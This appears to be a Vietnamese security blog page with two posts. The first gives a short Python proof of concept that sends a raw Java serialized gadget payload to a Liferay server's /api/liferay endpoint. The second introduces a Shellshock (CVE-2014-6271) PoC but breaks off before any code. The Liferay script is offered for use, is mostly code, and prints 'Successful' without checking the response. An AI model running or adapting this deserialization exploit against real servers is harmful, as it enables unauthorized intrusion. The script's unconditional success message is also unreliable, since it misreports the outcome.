[PoC] Liferay Poc by Me.

Lâu lâu không dev C# mệt mỏi quá using cả một đống thứ, add đủ loại dll, làm cái giao diện cũng mờ hết cả mắt. Thôi thì cuộc sống mà, up cái PoC liên quan đến Life vậy.

"Như một siêu sao người Thái Bình đã từng nói rằng: " Muốn ngồi ở một vị trí mà không ai ngồi được thì phải chịu những cảm giác mà không ai chịu được. "

My PoC:
import requests
url = input("URL:")
data = '\xAC\xED \x05sr .javax.management.BadAttributeValueExpException\xD4\xE7\xDA\xABc-F@\x02 \x01L \x03valt \x12Ljava/lang/Object;xr \x13java.lang.Exception\xD0\xFD\x1F>\x1A;\x1C\xC4\x02  xr \x13java.lang.Throwable\xD5\xC65\'9w\xB8\xCB\x03 \x04L \x05causet \x15Ljava/lang/Throwable;L \ndetailMessaget \x12Ljava/lang/String;[ \nstackTracet \x1E[Ljava/lang/StackTraceElement;L \x14suppressedExceptionst \x10Ljava/util/List;xpq ~ \bpur \x1E[Ljava.lang.StackTraceElement;\x02F*<<\xFD9\x02'
response = requests.post(url+"///api///liferay", data=data)
print ("Successful")

Thanks: https://sec.vnpt.vn/

[FUNNY] CVE 2014-6271 PoC by me (Shellshock)

Dạo này bận bịu với việc exploit dạo và research dăm ba cái vui vui nhiều quá thành ra không có thời gian viết lung tung trên blog. :)

Hôm nay nhân dịp đi training cho một lớp khá cơ bản về viết PoC như thế nào, thành ra lục lọi lại cái code python từ mấy năm trước, mặc dù cái CVE 2014-6271 (hay có cái tên mĩ miều là shellshock) đã khá cũ nhưng mà tự thấy cái PoC của mình nhanh hơn ngồi set metasploit (ảo tưởng tí). :))

Và đây là thành phần chính: